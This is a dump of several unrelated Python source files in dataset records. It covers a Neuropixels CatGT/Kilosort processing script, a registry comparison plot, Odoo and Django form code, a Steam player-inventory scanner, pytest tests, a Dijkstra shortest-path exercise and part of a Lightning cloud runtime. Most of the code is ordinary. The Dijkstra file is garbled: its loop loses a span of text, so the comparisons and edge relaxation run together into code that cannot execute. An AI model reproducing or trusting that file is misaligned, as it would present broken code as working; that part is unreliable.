header\nlog_from_json.writeHeader(logFullPath)\n\n\nfor spec in run_specs:\n\n    session_id = spec[0] + '_' + spec[1] + '_g' + spec[2]\n\n    # if the directory animal name_date does not yet exist, create it\n    catGT_dest = os.path.join(catGT_dest_parent, session_id)\n    if not os.path.exists(catGT_dest):\n        os.mkdir(catGT_dest)\n\n    # probe list == probe label list for 3A\n    prb_list = spec[4]\n\n    # create space for gfix_edits read from catGT log\n    gfix_edits = np.zeros(len(prb_list), dtype='float64')\n\n    # inputs for tPrime\n    fromStream_list = list()\n\n    for i, prb in enumerate(prb_list):\n\n        # Path to folder containing binaries.\n        # The assumed file structure for input is:\n        # /probe(computer) label/animal name/date/*.bin files\n        runFolder = os.path.join(npx_directory, prb, spec[0], spec[1])\n        # name of run in input data; note that this run name is not unique\n        # but repeated for different dates\n        runName = spec[0]\n\n        # build parameter strings for catGT edge extractions for this probe\n        currSY = spec[5][i]\n\n        # build the \"final\" name for the catGT output folder\n        # CatGT output will initially go into a folder named for the input;\n        # after running, rename it to this name
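\n        # with the example run_spec above, the first probe's folder becomes\n        # 'catgt_dl56_20181126ww2_g0' (illustrative, derived from the spec fields)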
\n        final_catGT_name = 'catgt_' + spec[0] + '_' + spec[1] + prb + '_g' + spec[2]\n        final_catGT_dest = os.path.join(catGT_dest, final_catGT_name)\n        print('final_catGT_dest: ', final_catGT_dest)\n\n        if currSY is not None:\n            ex_param_str = ''\n            for exparam in sy_ex_param_list:\n                if exparam[2] == -1:\n                    # use default tolerance\n                    currStr = ('SY=0,{0:d},{1:d},{2:d}'.format(currSY, exparam[0], exparam[1]))\n                else:\n                    currStr = ('SY=0,{0:d},{1:d},{2:d},{3:.1f}'.format(currSY, exparam[0], exparam[1], exparam[2]))\n                ex_param_str = ex_param_str + ' -' + currStr\n                if exparam == sync_param:\n                    # for TPrime, build the path to the extracted edges\n                    currNameStr = ('SY_{0:d}_{1:d}_{2:d}'.format(currSY, exparam[0], exparam[1]))\n                    sy_name = runName + '_g' + spec[2] + '_tcat.imec.' + currNameStr + '.txt'\n                    sy_path = os.path.join(catGT_dest, final_catGT_dest, sy_name)\n                    if i == 0:\n                        # this will be the toStream\n                        toStream = sy_path\n                        print('toStream path: ', toStream)\n                    else:\n                        # append to the list of fromStream paths\n                        fromStream_list.append(sy_path)\n                        print('fromStream path: ', fromStream_list[len(fromStream_list)-1])\n\n            probe_catGT_cmd_string = catGT_cmd_string + ' ' + ex_param_str\n\n            # build parameter string for PSTH events\n            if 'psth_events' in modules:\n                exparam = sy_ex_param_list[event_ex_param_index]\n                event_ex_param_str = ('SY=0,{0:d},{1:d},{2:d}'.format(currSY, exparam[0], exparam[1]))\n            else:\n                event_ex_param_str = 'SY=0,384,1,50' # just default filler\n\n        # Run CatGT\n        input_json = os.path.join(json_directory, session_id + '-input.json')\n        output_json = os.path.join(json_directory, session_id + '-output.json')\n        print('Creating json file for preprocessing')\n        print(runFolder)\n        # In this case, the run folder and probe folder are the same;\n        # parse trigger string using this folder to interpret 'start' and 'end'\n        first_trig, last_trig = SpikeGLX_utils.ParseTrigStr(spec[3], runFolder)\n        trigger_str = repr(first_trig) + ',' + repr(last_trig)\n\n        info = createInputJson(input_json, npx_directory=runFolder,\n                               continuous_file = None,\n                               spikeGLX_data = 'True',\n                               kilosort_output_directory=catGT_dest,\n                               catGT_run_name = runName,\n                               gate_string = spec[2],\n                               trigger_string = trigger_str,\n                               probe_string = '',\n                               catGT_stream_string = catGT_stream_string,\n                               catGT_cmd_string = probe_catGT_cmd_string,\n                               extracted_data_directory = catGT_dest\n                               )\n\n        if run_CatGT:\n\n            command = \"python -W ignore -m ecephys_spike_sorting.modules.\" + 'catGT_helper' + \" --input_json \" + input_json \\\n                      + \" --output_json \" + output_json\n            subprocess.check_call(command.split(' '))\n\n        # parse the CatGT log and write results to command line\n        # for 3A, there's only one probe, called 0\n        gfix_edits = SpikeGLX_utils.ParseCatGTLog(os.getcwd(), runName, spec[2], ['0'])\n        edit_string = '{:.3f}'.format(gfix_edits[0])\n        print(runName + ' gfix edits/sec: ' + edit_string)\n\n        # rename the output folder to a name that includes the date and probe name\n        orig_catGT_name = 'catgt_' + runName + '_g' + spec[2]\n        orig_catGT_out = os.path.join(catGT_dest, orig_catGT_name)\n        os.rename(orig_catGT_out, final_catGT_dest)\n\n        # finished preprocessing.\n\n        # create json files specific to this probe\n        input_json = os.path.join(json_directory, spec[0] + prb + '-input.json')\n\n        # location of the binary after renaming\n        data_directory = final_catGT_dest\n        # fileName, built from the input run name\n        fileName = runName + '_g' + spec[2] + '_tcat.imec.ap.bin'\n        continuous_file = os.path.join(data_directory, fileName)
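\n        # e.g. 'dl56_g0_tcat.imec.ap.bin' inside the renamed catgt folder for\n        # the example run_spec above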
\n\n        outputName = 'imec_' + prb + '_ks2'\n\n        # kilosort_postprocessing and noise_templates modules alter the files\n        # that are input to phy. If using these modules, keep a copy of the\n        # original phy output\n        if ('kilosort_postprocessing' in modules) or ('noise_templates' in modules):\n            ks_make_copy = True\n        else:\n            ks_make_copy = False\n\n        kilosort_output_dir = os.path.join(data_directory, outputName)\n\n        print(data_directory)\n        print(continuous_file)\n\n        info = createInputJson(input_json, npx_directory=npx_directory,\n                               continuous_file = continuous_file,\n                               spikeGLX_data = True,\n                               kilosort_output_directory=kilosort_output_dir,\n                               ks_make_copy = ks_make_copy,\n                               noise_template_use_rf = False,\n                               catGT_run_name = session_id,\n                               gate_string = spec[1],\n                               trigger_string = trigger_str,\n                               probe_string = '',\n                               catGT_stream_string = catGT_stream_string,\n                               catGT_cmd_string = probe_catGT_cmd_string,\n                               catGT_gfix_edits = gfix_edits[0],\n                               extracted_data_directory = catGT_dest,\n                               event_ex_param_str = event_ex_param_str\n                               )\n\n        # copy json file to data directory as record of the input parameters (and gfix edit rates)\n        shutil.copy(input_json, os.path.join(data_directory, session_id + '-input.json'))\n\n        for module in modules:\n            output_json = os.path.join(json_directory, session_id + '-' + module + '-output.json')\n            command = \"python -W ignore -m ecephys_spike_sorting.modules.\" + module + \" --input_json \" + input_json \\\n                      + \" --output_json \" + output_json\n            subprocess.check_call(command.split(' '))\n\n        log_from_json.addEntry(modules, json_directory, session_id, logFullPath)\n\n    if runTPrime:\n        # after the loop over probes, run TPrime to create files of\n        # event times -- edges detected in auxiliary files and spike times\n        # from each probe -- all aligned to a reference stream.\n\n        # create json files for calling TPrime\n        session_id = spec[0] + '_TPrime'\n        input_json = os.path.join(json_directory, session_id + '-input.json')\n        output_json = os.path.join(json_directory, session_id + '-output.json')\n\n        info = createInputJson(input_json, npx_directory=npx_directory,\n                               continuous_file = continuous_file,\n                               spikeGLX_data = True,\n                               kilosort_output_directory=kilosort_output_dir,\n                               ks_make_copy = ks_make_copy,\n                               noise_template_use_rf = False,\n                               catGT_run_name = spec[0],\n                               gate_string = spec[1],\n                               trigger_string = trigger_str,\n                               probe_string = '',\n                               catGT_stream_string = catGT_stream_string,\n                               catGT_cmd_string = catGT_cmd_string,\n                               catGT_gfix_edits = gfix_edits[0],\n                               extracted_data_directory = catGT_dest,\n                               event_ex_param_str = event_ex_param_str,\n                               sync_period = sync_period,\n                               toStream_sync_params = '',\n                               niStream_sync_params = '',\n                               toStream_path_3A = toStream,\n                               fromStream_list_3A = fromStream_list\n                               )\n\n        command = \"python -W ignore -m ecephys_spike_sorting.modules.\" + 'tPrime_helper' + \" --input_json \" + input_json \\\n                  + \" --output_json \" + output_json\n        subprocess.check_call(command.split(' '))\n","sub_path":"ecephys_spike_sorting/scripts/spikeGLX_3A_DL.py","file_name":"spikeGLX_3A_DL.py","file_ext":"py","file_size_in_byte":15382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"74624881","text":"# -*- coding: utf-8 -*-\n\n\"\"\"This script compares what's in OBO, OLS, and MIRIAM.\"\"\"\n\nimport json\nimport os\n\nimport matplotlib.pyplot as plt\nfrom matplotlib_venn import venn3\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\n\ndef _get_json(name):\n    with open(os.path.join(HERE, name)) as file:
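\n        # each registry dump is a JSON array; the identifier key differs per\n        # registry (MIRIAM 'prefix', OLS 'ontologyId', OBO Foundry 'id'), which\n        # is why main() below reads a different field from each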
\n        return json.load(file)\n\n\ndef main():\n    \"\"\"Compare the registries.\"\"\"\n    miriam = _get_json('miriam.json')\n    miriam_entries = {\n        entry['prefix'].lower()\n        for entry in miriam\n    }\n\n    ols = _get_json('ols.json')\n    ols_entries = {\n        entry['ontologyId'].lower()\n        for entry in ols\n    }\n\n    obofoundry = _get_json('obofoundry.json')\n    obofoundry_entries = {\n        entry['id'].lower()\n        for entry in obofoundry\n    }\n\n    venn3(\n        subsets=[miriam_entries, ols_entries, obofoundry_entries],\n        set_labels=('MIRIAM', 'OLS', 'OBOFoundry'),\n    )\n    plt.tight_layout()\n    plt.savefig('compare.svg')\n\n    # nothing interesting unique to OLS\n    # print(*sorted(ols_entries - miriam_entries - obofoundry_entries), sep='\\n')\n    # nothing interesting unique to OBO\n    # print(*sorted(obofoundry_entries - miriam_entries - ols_entries), sep='\\n')\n    # Some things missing from miriam\n    # print(*sorted(obofoundry_entries.union(ols_entries) - miriam_entries), sep='\\n')\n\n    # Stuff important enough to make it everywhere\n    print(*sorted(set.intersection(ols_entries, miriam_entries, obofoundry_entries)), sep='\\n')\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"src/pyobo/registries/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"630713238","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, fields, api, _\n\n\nclass WarningBox(models.TransientModel):\n    _name = \"si_core.warning.box\"\n    _description = \"SI Core Warning Box\"\n\n    # store message to show in a popup confirmation window\n    message = fields.Text(default=lambda self: self.env.context.get('message'))\n\n    def accept_confirmation(self):\n        \"\"\"\n        @Override\n        write the action for button \"OK\"\n        \"\"\"\n        default_act = {'type': 'ir.actions.act_window_close'}\n        return default_act\n\n    def get_action(self, title='Warning', message='There are some problems.', view_id=None):\n        \"\"\"\n        Get the action data to return to the client\n        :param str title:\n        :param str message:\n        :param int view_id:\n        :return: The action data\n        :rtype: dict\n        \"\"\"\n        if view_id is None:\n            view_id = self.env.ref('si_core.view_si_core_warning_box_form').id\n\n        action = {\n            'type': 'ir.actions.act_window',\n            'name': _(title),\n            'res_model': 'si_core.warning.box',\n            'view_mode': 'form',\n            'target': 'new',\n            'views': [[view_id, 'form']],\n            'context': {\n                'message': message\n            }\n        }\n\n        return action\n","sub_path":"SI/si_core/wizard/warning_box_model.py","file_name":"warning_box_model.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"632512862","text":"from django import forms\n\nfrom service_api.models.articles import Article\nfrom service_api.models.disciplines import Game\nfrom service_api.models.videos import Video, VideoAttribute\n\n\nclass UpsertVideoForm(forms.Form):\n    platform_video_id = forms.CharField(required=True,\n                                        widget=forms.TextInput(attrs={\n                                            'class': 'form-control'}),\n                                        label='Youtubeの動画ID')\n\n    game = forms.ModelChoiceField(required=True,\n                                  queryset=Game.objects.filter(is_active=True).all(),\n                                  widget=forms.Select(attrs={\n                                      'class': 'form-control'}),\n                                  label='ゲームタイトル')\n    article = forms.ModelChoiceField(required=False,\n                                     queryset=Article.objects.filter(is_active=True).all(),\n                                     widget=forms.Select(attrs={\n                                         'class': 'form-control'}),\n                                     label='記事タイトル')\n\n\nclass UpsertVideoAttributeForm(forms.ModelForm):\n    video = 
forms.ModelChoiceField(required=True,\n queryset=Video.objects.filter(enabled=True).all(),\n widget=forms.Select(attrs={\n 'class': 'form-control'}),\n label='動画タイトル')\n game = forms.ModelChoiceField(required=True,\n queryset=Game.objects.filter(is_active=True).all(),\n widget=forms.Select(attrs={\n 'class': 'form-control'}),\n label='ゲームタイトル')\n article = forms.ModelChoiceField(required=False,\n queryset=Article.objects.filter(is_active=True).all(),\n widget=forms.Select(attrs={\n 'class': 'form-control'}),\n label='記事タイトル')\n\n class Meta:\n model = VideoAttribute\n fields = ('video', 'game', 'article', )\n","sub_path":"video/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"497659826","text":"#!/usr/bin/env python3\n\nfrom Core.player import Player\nimport threading\nimport time\nimport re\n\nGET_SUMMARIES_URL = 'http://api.steampowered.com/isteamuser/getplayersummaries/v2/?key={0}&steamids=%s'\n\n\nclass BaseScan(threading.Thread):\n def __init__(self, process_manager, tab):\n super().__init__()\n self.process_manager = process_manager\n self.tab = tab\n\n self.end_ = False\n self.start_time = None\n\n self.done = 0\n self.total = 0\n\n self.players_processor = None\n self.steam_id64s = []\n self.requirements = {}\n\n def run(self):\n pass\n\n def finish(self):\n self.reset_button()\n self.tab.finish_scan(self)\n\n def end(self):\n if self.end_:\n return\n self.end_ = True\n self.configure_ending()\n\n def find_ids(self, input_text):\n default_id = (1 << 56) | (1 << 52) | (1 << 32)\n steam_id64s = []\n\n raw_ids = re.findall('[\\d]+', input_text)\n for id64 in raw_ids:\n if (int(id64) & default_id) == default_id:\n steam_id64s.append(int(id64))\n\n steam_id32s = re.findall('STEAM_0:[\\d]:[\\d]+', input_text, re.VERBOSE)\n for id32 in steam_id32s:\n x, y, z = re.findall('[\\d]+', id32)\n id64 = default_id | (int(z) << 1) | int(y)\n steam_id64s.append(id64)\n\n steam_id3s = re.findall('([U:[\\d]:[\\d]+])', input_text, re.VERBOSE)\n for id3 in steam_id3s:\n id64 = default_id | int(re.findall('[\\d]+', id3)[1])\n steam_id64s.append(id64)\n\n return list(set(steam_id64s))\n\n def get_max_hours(self):\n if not self.tab.max_hours:\n return None\n return int(self.tab.max_hours)\n\n def get_minimum_item_value(self):\n return float(self.tab.raw_minimum_item_value)\n\n def get_minimum_player_value(self):\n return float(self.tab.raw_minimum_player_value)\n\n def find_database_items(self, item_defindex, requirements):\n steam_id64s = []\n for item in self.process_manager.database['items'][item_defindex].find(requirements):\n steam_id64s.append(item['player_id'])\n\n return list(set(steam_id64s))\n\n def get_player_summaries(self, players):\n steam_id64s = [player.id64 for player in players]\n url = GET_SUMMARIES_URL.format(self.process_manager.config['api']['steam_api_key']) % steam_id64s\n raw_summaries = self.process_manager.request_manager.make_api_request(url, mode='json', priority=False, tags=(self.tab,))\n\n if self.end_:\n return\n\n summaries = {int(summary['steamid']): summary for summary in raw_summaries['response']['players']}\n for player in players:\n if player.id64 in summaries:\n if summaries[player.id64]['communityvisibilitystate'] == 1:\n continue\n if 'lastlogoff' not in summaries[player.id64]:\n continue\n player.name = summaries[player.id64]['personaname']\n player.avatar = summaries[player.id64]['avatarmedium']\n player.status = 
summaries[player.id64]['personastate'] if 'gameid' not in summaries[player.id64] else -1\n player.last_online = summaries[player.id64]['lastlogoff']\n\n def scan(self):\n start_time = time.time()\n summary_thread = None\n hours_threads = []\n item_threads = []\n display_threads = []\n\n ids = self.steam_id64s[:]\n players = []\n pending = []\n ready = []\n current_items = []\n current_hours = []\n done = []\n\n self.done = 0\n self.total = len(ids)\n\n self.update_progress()\n\n while ids or players or pending or ready or current_items or current_hours or done:\n time.sleep(0.01)\n if self.end_:\n request_cancel_threads = [threading.Thread(target=self.process_manager.request_manager.cancel_requests, args=(self.tab,))]\n request_cancel_threads[-1].start()\n for id64 in self.steam_id64s:\n request_cancel_threads.append(threading.Thread(target=self.process_manager.request_manager.cancel_requests, args=(id64,)))\n request_cancel_threads[-1].start()\n\n for request_cancel_thread in request_cancel_threads:\n request_cancel_thread.join()\n if summary_thread is not None:\n summary_thread.join()\n for hours_thread in hours_threads:\n hours_thread.join()\n for item_thread in item_threads:\n item_thread.join()\n for display_thread in display_threads:\n display_thread.join()\n self.set_status('Ended - %s %s - %s' % (self.total, 'Player' if self.total == 1 else 'Players', self.run_time(start_time)), 0, 0)\n return\n\n for player in done[:]:\n done.remove(player)\n player.update_database()\n self.done += 1\n self.update_progress()\n if self.tab.display_players == 'True':\n if not player.check(self.tab.f2p, self.tab.marked, self.tab.status, self.get_max_hours()):\n continue\n if not player.check_items(self.requirements, self.get_minimum_item_value(), self.get_minimum_player_value()):\n continue\n display_threads.append(threading.Thread(target=self.tab.display_player, args=(player,)))\n display_threads[-1].start()\n\n for player in current_hours[:]:\n if hours_threads[current_hours.index(player)].is_alive():\n continue\n del hours_threads[current_hours.index(player)]\n current_hours.remove(player)\n done.append(player)\n\n for player in current_items[:]:\n if item_threads[current_items.index(player)].is_alive():\n continue\n del item_threads[current_items.index(player)]\n current_items.remove(player)\n if not player.items:\n self.done += 1\n self.update_progress()\n player.update_failed_database()\n continue\n if not self.tab.collect_hours == 'True':\n done.append(player)\n continue\n current_hours.append(player)\n hours_threads.append(threading.Thread(target=player.get_hours))\n hours_threads[-1].start()\n\n if self.end_:\n continue\n\n running = len(current_items) + len(current_hours)\n if running < int(self.process_manager.config['technical']['simultaneous_scans']):\n for player in ready[:int(self.process_manager.config['technical']['simultaneous_scans']) - running]:\n ready.remove(player)\n\n current_items.append(player)\n item_threads.append(threading.Thread(target=player.get_items))\n item_threads[-1].start()\n\n if summary_thread is not None:\n if not summary_thread.is_alive():\n for player in pending[:]:\n pending.remove(player)\n if player.status == -2:\n player.update_failed_database()\n self.done += 1\n self.update_progress()\n continue\n if not player.check_status(self.tab.status):\n self.done += 1\n self.update_progress()\n continue\n if not player.check_last_online(float(self.tab.raw_last_online)):\n self.done += 1\n self.update_progress()\n continue\n ready.append(player)\n\n summary_thread 
= None\n\n if len(ready) < 100:\n if players:\n if summary_thread is None:\n pending.extend(players[:100])\n summary_thread = threading.Thread(target=self.get_player_summaries, args=(players[:100],))\n summary_thread.start()\n del players[:100]\n\n if len(players) < 200:\n for id64 in ids[:200]:\n player = Player(self.process_manager, id64)\n ids.remove(id64)\n if player.get_database_player():\n if self.tab.marked != 'Both':\n if str(player.marked) != self.tab.marked:\n self.done += 1\n self.update_progress()\n continue\n if self.get_max_hours() is not None:\n if player.hours is not None:\n if player.hours > self.get_max_hours():\n self.done += 1\n self.update_progress()\n continue\n else:\n if self.tab.marked == 'True':\n self.done += 1\n self.update_progress()\n continue\n players.append(player)\n\n for display_thread in display_threads:\n display_thread.join()\n self.set_status('Success - %s %s - %s' % (self.total, 'Player' if self.total == 1 else 'Players', self.run_time(self.start_time)), 1, 1)\n\n def mark_time(self):\n self.start_time = time.time()\n\n def run_time(self, start_time):\n s = round(time.time() - start_time, 1)\n m, s = divmod(s, 60)\n h, m = divmod(m, 60)\n time_string = ''\n if h:\n time_string += '%s %s : ' % (h, 'Hour' if h == 1 else 'Hours')\n if m or h:\n time_string += '%s %s : ' % (m, 'Minute' if m == 1 else 'Minutes')\n time_string += '%s %s' % (s, 'Second' if s == 1 else 'Seconds')\n return time_string\n\n def configure_ending(self):\n self.set_status('Ending...', 0, 0)\n\n def set_status(self, message, value, maximum):\n pass\n\n def reset_button(self):\n pass\n\n def update_progress(self):\n if not self.end_:\n self.set_status('Players: %s of %s' % (self.done, self.total), self.done, self.total)\n","sub_path":"src/Scans/basescan.py","file_name":"basescan.py","file_ext":"py","file_size_in_byte":10719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"477445415","text":"import pytest\nimport os\nimport json\n\nimport pandas as pd\n\nfrom nutrition_labels.evaluate import get_training_data, EvaluateGrantTagger\n\nmodel_scores = [\n {\n \"model_1\": {\n \"id_A\": {\"Truth\": 1, \"Prediction\": 1, \"Test/train\": \"Train\"},\n \"id_B\": { \"Truth\": 0, \"Prediction\": 1, \"Test/train\": \"Test\"},\n \"id_C\": {\"Truth\": 1, \"Prediction\": 0, \"Test/train\": \"Test\"},\n \"id_D\": {\"Truth\": 0, \"Prediction\": 1, \"Test/train\": \"Test\"}\n }\n },\n {\n \"model_2\": {\n \"id_A\": {\"Truth\": 1, \"Prediction\": 1, \"Test/train\": \"Train\"},\n \"id_B\": { \"Truth\": 0, \"Prediction\": 0, \"Test/train\": \"Test\"},\n \"id_C\": {\"Truth\": 1, \"Prediction\": 1, \"Test/train\": \"Test\"},\n \"id_D\": {\"Truth\": 0, \"Prediction\": 0, \"Test/train\": \"Test\"}\n }\n },\n ]\n\nexpected_training_data = pd.DataFrame([\n {'Grant ID': 'id_A', 'Truth': 1, 'Test/train': 'Train'},\n {'Grant ID': 'id_B', 'Truth': 0, 'Test/train': 'Test'},\n {'Grant ID': 'id_C', 'Truth': 1, 'Test/train': 'Test'},\n {'Grant ID': 'id_D', 'Truth': 0, 'Test/train': 'Test'}\n ])\n\ndef test_get_training_data(tmp_path):\n\n with open(os.path.join(tmp_path, \"training_information.json\"), \"a\") as f:\n for line in model_scores:\n f.write(json.dumps(line))\n f.write('\\n')\n training_data = get_training_data(tmp_path, grant_id_col='Grant ID')\n\n assert training_data.equals(expected_training_data)\n\ndef test_find_datasets_included():\n\n eval_grant_tagger = EvaluateGrantTagger(\n model_dirs=['model_dir'],\n epmc_file_dir='epmc_file_dir.csv',\n 
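# placeholder paths: this test only asserts which dataset sources are\n        # reported by find_datasets_included, so (assumption about the library)\n        # the CSV files are never opened here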
\n        rf_file_dir='rf_file_dir.csv'\n    )\n    eval_grant_tagger.training_data = expected_training_data\n    datasets_included = eval_grant_tagger.find_datasets_included()\n\n    assert set(datasets_included) == set(['test', 'EPMC', 'RF'])\n\ndef test_return_dataset():\n\n    eval_grant_tagger = EvaluateGrantTagger(\n        model_dirs=['model_dir']\n    )\n    eval_grant_tagger.training_data = expected_training_data\n    eval_grant_tagger.training_label_name = 'Truth'\n\n    dataset_info = eval_grant_tagger.return_dataset(\"test\")\n\n    assert len(dataset_info[\"dataset\"]) == 3\n    assert 'id_A' not in dataset_info[\"dataset\"]['Grant ID']\n    assert dataset_info[\"label_name\"] == 'Truth'\n","sub_path":"tests/test_evaluation.py","file_name":"test_evaluation.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"180206120","text":"import sys\nsys.stdin = open('최소이동거리.txt','r')\n\nT = int(input())\nfor tc in range(1,T+1):\n    V,E = map(int,input().split())\n    adj = {i:[] for i in range(V+1)}\n    for _ in range(E):\n        s,e,c = map(int,input().split())\n        adj[s].append([e,c])\n\n    INF = float('inf')\n    dist = [INF] * V\n    selected = [False] * V\n\n    dist[0] = 0\n    cnt = 0\n    while cnt < V:\n        # find the unvisited vertex with the minimum dist\n        # (the comparison operators of this loop were lost in extraction;\n        # the selection and relaxation steps are reconstructed below)\n        min = INF\n        u = -1\n        for i in range(V):\n            if not selected[i] and dist[i] < min:\n                min = dist[i]\n                u = i\n        selected[u] = True\n        cnt += 1\n        # relax the edges leaving u\n        for w, cost in adj[u]:\n            if dist[w] > dist[u] + cost:\n                dist[w] = dist[u] + cost\n    print(dist)\n\n","sub_path":"Algorithm Problem Solvings/5월22일/그래프_Dijkstra.py","file_name":"그래프_Dijkstra.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"310186642","text":"import fnmatch\nimport logging\nimport os\nimport random\nimport string\nimport sys\nimport time\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Any, Callable, List, Optional, Union\n\nfrom lightning_cloud.openapi import (\n    Body3,\n    Body4,\n    Body7,\n    Body8,\n    Body9,\n    Gridv1ImageSpec,\n    V1BuildSpec,\n    V1DependencyFileInfo,\n    V1Drive,\n    V1DriveSpec,\n    V1DriveStatus,\n    V1DriveType,\n    V1EnvVar,\n    V1Flowserver,\n    V1LightningappInstanceSpec,\n    V1LightningappInstanceState,\n    V1LightningworkDrives,\n    V1LightningworkSpec,\n    V1Metadata,\n    V1NetworkConfig,\n    V1PackageManager,\n    V1ProjectClusterBinding,\n    V1PythonDependencyInfo,\n    V1SourceType,\n    V1UserRequestedComputeConfig,\n    V1Work,\n)\nfrom lightning_cloud.openapi.rest import ApiException\n\nfrom lightning_app.core.constants import CLOUD_UPLOAD_WARNING, DISABLE_DEPENDENCY_CACHE\nfrom lightning_app.runners.backends.cloud import CloudBackend\nfrom lightning_app.runners.runtime import Runtime\nfrom lightning_app.source_code import LocalSourceCodeDir\nfrom lightning_app.storage import Drive\nfrom lightning_app.utilities.cloud import _get_project\nfrom lightning_app.utilities.dependency_caching import get_hash\nfrom lightning_app.utilities.packaging.app_config import AppConfig, find_config_file\nfrom lightning_app.utilities.packaging.lightning_utils import _prepare_lightning_wheels_and_requirements\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass CloudRuntime(Runtime):\n\n    backend: Union[str, CloudBackend] = \"cloud\"\n\n    def dispatch(\n        self,\n        on_before_run: Optional[Callable] = None,\n        name: str = \"\",\n        cluster_id: str = None,\n        **kwargs: Any,\n    ):\n        \"\"\"Method to dispatch and run the :class:`~lightning_app.core.app.LightningApp` in the cloud.\"\"\"\n        # not a user-facing error ideally -- this should never happen in a normal user workflow\n        if not self.entrypoint_file:
\n            raise ValueError(\n                \"Entrypoint file not provided. Did you forget to \"\n                \"initialize the Runtime object with `entrypoint_file` argument?\"\n            )\n\n        # Determine the root of the project: start at the entrypoint_file and look for nearby Lightning config files,\n        # going up the directory structure. The root of the project is where the Lightning config file is located.\n\n        # TODO: verify lightning version\n        # _verify_lightning_version()\n        config_file = find_config_file(self.entrypoint_file)\n        app_config = AppConfig.load_from_file(config_file) if config_file else AppConfig()\n        root = config_file.parent if config_file else Path(self.entrypoint_file).absolute().parent\n        cleanup_handle = _prepare_lightning_wheels_and_requirements(root)\n        repo = LocalSourceCodeDir(path=root)\n        self._check_uploaded_folder(root, repo)\n        requirements_file = root / \"requirements.txt\"\n        # The entry point file needs to be relative to the root of the uploaded source file directory,\n        # because the backend will invoke the lightning commands relative to said source directory\n        app_entrypoint_file = Path(self.entrypoint_file).absolute().relative_to(root)\n\n        if name:\n            # Override the name if provided by the CLI\n            app_config.name = name\n\n        app_config.save_to_dir(root)\n\n        print(f\"The name of the app is: {app_config.name}\")\n\n        work_reqs: List[V1Work] = []\n        v1_env_vars = [V1EnvVar(name=k, value=v) for k, v in self.env_vars.items()]\n        for flow in self.app.flows:\n            for work in flow.works(recurse=False):\n                work_requirements = \"\\n\".join(work.cloud_build_config.requirements)\n                build_spec = V1BuildSpec(\n                    commands=work.cloud_build_config.build_commands(),\n                    python_dependencies=V1PythonDependencyInfo(\n                        package_manager=V1PackageManager.PIP, packages=work_requirements\n                    ),\n                    image=work.cloud_build_config.image,\n                )\n                user_compute_config = V1UserRequestedComputeConfig(\n                    name=work.cloud_compute.name,\n                    count=1,\n                    disk_size=work.cloud_compute.disk_size,\n                    preemptible=work.cloud_compute.preemptible,\n                    shm_size=work.cloud_compute.shm_size,\n                )\n\n                drive_specs: List[V1LightningworkDrives] = []\n                for drive_attr_name, drive in [\n                    (k, getattr(work, k)) for k in work._state if isinstance(getattr(work, k), Drive)\n                ]:\n                    if drive.protocol == \"lit://\":\n                        drive_type = V1DriveType.NO_MOUNT_S3\n                        source_type = V1SourceType.S3\n                    elif drive.protocol == \"s3://\":\n                        drive_type = V1DriveType.INDEXED_S3\n                        source_type = V1SourceType.S3\n                    else:\n                        raise RuntimeError(\n                            f\"unknown drive protocol `{drive.protocol}`. 
Please verify this \"\n f\"drive type has been configured for use in the cloud dispatcher.\"\n )\n\n drive_specs.append(\n V1LightningworkDrives(\n drive=V1Drive(\n metadata=V1Metadata(\n name=f\"{work.name}.{drive_attr_name}\",\n ),\n spec=V1DriveSpec(\n drive_type=drive_type,\n source_type=source_type,\n source=f\"{drive.protocol}{drive.id}\",\n ),\n status=V1DriveStatus(),\n ),\n mount_location=str(drive.root_folder),\n ),\n )\n\n random_name = \"\".join(random.choice(string.ascii_lowercase) for _ in range(5))\n spec = V1LightningworkSpec(\n build_spec=build_spec,\n cluster_id=cluster_id,\n drives=drive_specs,\n user_requested_compute_config=user_compute_config,\n network_config=[V1NetworkConfig(name=random_name, port=work.port)],\n )\n work_reqs.append(V1Work(name=work.name, spec=spec))\n\n # We need to collect a spec for each flow that contains a frontend so that the backend knows\n # for which flows it needs to start servers by invoking the cli (see the serve_frontend() method below)\n frontend_specs: List[V1Flowserver] = []\n for flow_name in self.app.frontends.keys():\n frontend_spec = V1Flowserver(name=flow_name)\n frontend_specs.append(frontend_spec)\n\n app_spec = V1LightningappInstanceSpec(\n app_entrypoint_file=str(app_entrypoint_file),\n enable_app_server=self.start_server,\n flow_servers=frontend_specs,\n desired_state=V1LightningappInstanceState.RUNNING,\n env=v1_env_vars,\n )\n # if requirements file at the root of the repository is present,\n # we pass just the file name to the backend, so backend can find it in the relative path\n if requirements_file.is_file():\n app_spec.image_spec = Gridv1ImageSpec(\n dependency_file_info=V1DependencyFileInfo(package_manager=V1PackageManager.PIP, path=\"requirements.txt\")\n )\n if not DISABLE_DEPENDENCY_CACHE and not kwargs.get(\"no_cache\"):\n # hash used for caching the dependencies\n app_spec.dependency_cache_key = get_hash(requirements_file)\n # we'll get the default project (quite similar to Github Organization) from the backend\n project = _get_project(self.backend.client)\n\n try:\n list_apps_resp = self.backend.client.lightningapp_v2_service_list_lightningapps_v2(\n project.project_id, name=app_config.name\n )\n if list_apps_resp.lightningapps:\n # There can be only one app with unique project_id<>name pair\n lightning_app = list_apps_resp.lightningapps[0]\n else:\n app_body = Body7(name=app_config.name, can_download_source_code=True)\n lightning_app = self.backend.client.lightningapp_v2_service_create_lightningapp_v2(\n project.project_id, app_body\n )\n\n release_body = 